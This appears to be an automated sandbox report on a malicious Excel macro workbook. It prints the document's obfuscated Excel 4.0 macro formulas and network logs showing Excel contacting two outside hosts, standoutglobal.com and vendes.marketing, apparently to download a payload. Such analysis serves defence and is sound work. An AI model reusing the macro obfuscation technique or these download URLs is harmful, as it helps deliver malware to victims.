                                                                                                                            SHA256:bd2212ffe0d388a61a3041f146a70b242fa69eace0c7a5f5fe991126a679eec4
                                                                                                                            SHA512:09dec794ce057a4ddddef5a47d4de886949d4e23b447835b843308fc0584ce385f547a2441ddf1ea43e6ae5997d98fbd7657030f7645f2b32e01b8d9ca5f96e7
                                                                                                                            SSDEEP:768:e/I83XfjrjevZCwVItvxmUxjfC30+kS4QyoO0VIqwgb:enrIItvxXYk4pTVIqR
                                                                                                                            File Content Preview:PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:74ecd0e2f696908c

                                                                                                                            Static OLE Info

                                                                                                                            General

                                                                                                                            Document Type:OpenXML
                                                                                                                            Number of OLE Files:1

                                                                                                                            OLE File "CU-6431 report.xlsm"

                                                                                                                            Indicators

                                                                                                                            Has Summary Info:
                                                                                                                            Application Name:
                                                                                                                            Encrypted Document:
                                                                                                                            Contains Word Document Stream:
                                                                                                                            Contains Workbook/Book Stream:
                                                                                                                            Contains PowerPoint Document Stream:
                                                                                                                            Contains Visio Document Stream:
                                                                                                                            Contains ObjectPool Stream:
                                                                                                                            Flash Objects Count:
                                                                                                                            Contains VBA Macros:

                                                                                                                            Macro 4.0 Code

                                                                                                                            4,7,=CHAR('Ss1'!E45)
11,1,o

                                                                                                                            1,5,L
11,1,=CHAR('Ss1'!N43)

                                                                                                                            2,0,r
10,4,=CHAR('Ss1'!D39)

                                                                                                                            1,8,C
12,3,=CHAR('Ss1'!S46)

                                                                                                                            1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)

                                                                                                                            2,7,=
8,2,=CHAR('Ss1'!G40)

                                                                                                                            1,2,A
7,8,=CHAR('Ss1'!J39)

                                                                                                                            2,6,=CHAR('Ss1'!R41)
9,1,e

                                                                                                                            Network Behavior

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 2, 2021 11:35:21.133919001 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:21.294806957 CET8049744162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:21.294945955 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:21.295418024 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:21.456195116 CET8049744162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:22.259110928 CET8049744162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:22.259352922 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:22.271867037 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:22.271958113 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:22.272128105 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:22.273984909 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:22.274004936 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:22.766743898 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:22.767036915 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:22.805201054 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:22.805236101 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:22.805609941 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:22.805713892 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:22.806834936 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:22.848902941 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:24.053479910 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:24.053548098 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:24.053684950 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:24.053724051 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:24.053747892 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:24.053803921 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:24.067846060 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:24.068295002 CET44349745162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:24.068375111 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:24.068439007 CET49745443192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:24.118944883 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:24.229556084 CET8049746107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:24.229775906 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:24.230601072 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:24.340986967 CET8049746107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.175854921 CET8049746107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.176156044 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.190640926 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.190696001 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.190850019 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.191468000 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.191490889 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.546701908 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.547060966 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.559616089 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.559654951 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.559947968 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:25.560098886 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.561243057 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:25.604865074 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.803525925 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.803574085 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.803781033 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.803817034 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.803941011 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.803956032 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.804691076 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.804857969 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.804884911 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.804956913 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.913943052 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.914113998 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.914153099 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.914221048 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.914786100 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.914891958 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:26.914906025 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:26.914966106 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.024574041 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.024923086 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.025016069 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.025038004 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.025146008 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.025152922 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.025384903 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163017035 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163151026 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163369894 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163405895 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163427114 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163439989 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163563967 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163582087 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163603067 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163682938 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.163702011 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.163831949 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.165640116 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.165787935 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.165802956 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.165937901 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.264194965 CET8049744162.240.9.126192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.264498949 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:35:27.273766994 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.273947001 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.274218082 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.274256945 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.274282932 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.274570942 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.274590969 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.274714947 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478631020 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478745937 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478756905 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478777885 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478816032 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478841066 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478847980 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478869915 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478899002 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478905916 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.478915930 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.478964090 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479135036 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479218960 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479231119 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479286909 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479300976 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479326010 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479373932 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479403973 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479408979 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479576111 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479612112 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479703903 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479713917 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479768038 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479825020 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479895115 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.479907036 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479926109 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.479954958 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.480010033 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.480016947 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.480071068 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.589056969 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.589200020 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.589258909 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.589294910 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.597692966 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.597739935 CET44349747107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:27.597757101 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:27.597824097 CET49747443192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:35:30.176702023 CET8049746107.180.46.229192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:30.176899910 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:07.268068075 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:07.268605947 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:07.610133886 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:07.719472885 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:08.219482899 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:08.532373905 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:09.422728062 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:10.141457081 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:11.829154968 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:13.360491037 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:16.630887985 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:19.798527002 CET4974480192.168.2.3162.240.9.126
                                                                                                                            Dec 2, 2021 11:37:26.236566067 CET4974680192.168.2.3107.180.46.229
                                                                                                                            Dec 2, 2021 11:37:32.683427095 CET4974480192.168.2.3162.240.9.126

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 2, 2021 11:35:21.113451004 CET5415453192.168.2.38.8.8.8
                                                                                                                            Dec 2, 2021 11:35:21.131402969 CET53541548.8.8.8192.168.2.3
                                                                                                                            Dec 2, 2021 11:35:24.094537020 CET5280653192.168.2.38.8.8.8
                                                                                                                            Dec 2, 2021 11:35:24.114315033 CET53528068.8.8.8192.168.2.3

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                            Dec 2, 2021 11:35:21.113451004 CET192.168.2.38.8.8.80xfda6Standard query (0)standoutglobal.comA (IP address)IN (0x0001)
                                                                                                                            Dec 2, 2021 11:35:24.094537020 CET192.168.2.38.8.8.80x40faStandard query (0)vendes.marketingA (IP address)IN (0x0001)

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                            Dec 2, 2021 11:35:21.131402969 CET8.8.8.8192.168.2.30xfda6No error (0)standoutglobal.com162.240.9.126A (IP address)IN (0x0001)
                                                                                                                            Dec 2, 2021 11:35:24.114315033 CET8.8.8.8192.168.2.30x40faNo error (0)vendes.marketing107.180.46.229A (IP address)IN (0x0001)

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • standoutglobal.com
                                                                                                                            • vendes.marketing

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            0192.168.2.349745162.240.9.126443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            1192.168.2.349747107.180.46.229443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            2192.168.2.349744162.240.9.12680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Dec 2, 2021 11:35:21.295418024 CET1236OUTGET /2/MWpqeVgZ/ HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: standoutglobal.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 2, 2021 11:35:22.259110928 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Thu, 02 Dec 2021 10:35:20 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding,Cookie
                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                            X-Redirect-By: WordPress
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                            Location: https://standoutglobal.com/2/MWpqeVgZ/
                                                                                                                            Content-Length: 0
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            3192.168.2.349746107.180.46.22980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Dec 2, 2021 11:35:24.230601072 CET1251OUTGET /transmigrant/Wplzr/ HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: vendes.marketing
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 2, 2021 11:35:25.175854921 CET1252INHTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Thu, 02 Dec 2021 10:35:24 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Powered-By: PHP/7.3.30
                                                                                                                            Link: <https://vendes.marketing/wp-json/>; rel="https://api.w.org/"
                                                                                                                            Expires: Thu, 02 Dec 2021 11:35:25 GMT
                                                                                                                            Cache-Control: max-age=3600
                                                                                                                            X-Redirect-By: WordPress
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                            Location: https://vendes.marketing
                                                                                                                            Content-Length: 0
                                                                                                                            Keep-Alive: timeout=5
                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            0192.168.2.349745162.240.9.126443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            2021-12-02 10:35:22 UTC0OUTGET /2/MWpqeVgZ/ HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Host: standoutglobal.com
                                                                                                                            2021-12-02 10:35:24 UTC0INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 02 Dec 2021 10:35:21 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding,Cookie
                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                            Link: <https://standoutglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, close
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            2021-12-02 10:35:24 UTC0INData Raw: 32 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 73 74 79 6c 65 3e 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e 61 62 2d 69 63 6f 6e 3a 62 65 66 6f 72 65
                                                                                                                            Data Ascii: 2000<!doctype html><htmllang="en-US"><head><metacharset="UTF-8"><metaname="viewport" content="width=device-width, initial-scale=1"><linkrel="profile" href="http://gmpg.org/xfn/11"><style>#wpadminbar #wp-admin-bar-wccp_free_top_button .ab-icon:before
                                                                                                                            2021-12-02 10:35:24 UTC8INData Raw: 6e 65 77 73 2d 70 6f 72 74 61 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 6e 70 2d 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6a 65 74 70 61 63 6b 5f 63 73 73 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 30 2e 77 70 2e 63 6f 6d 2f 70 2f 6a 65 74 70 61 63 6b 2f 31 30 2e 33 2f 63 73 73 2f 6a 65 74 70 61 63 6b 2e 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 30 2e 77 70 2e 63
                                                                                                                            Data Ascii: news-portal/assets/css/np-responsive.css' type='text/css' media='all' /><linkrel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/10.3/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.c
                                                                                                                            2021-12-02 10:35:24 UTC8INData Raw: 0d 0a
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            1192.168.2.349747107.180.46.229443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            2021-12-02 10:35:25 UTC8OUTGET / HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
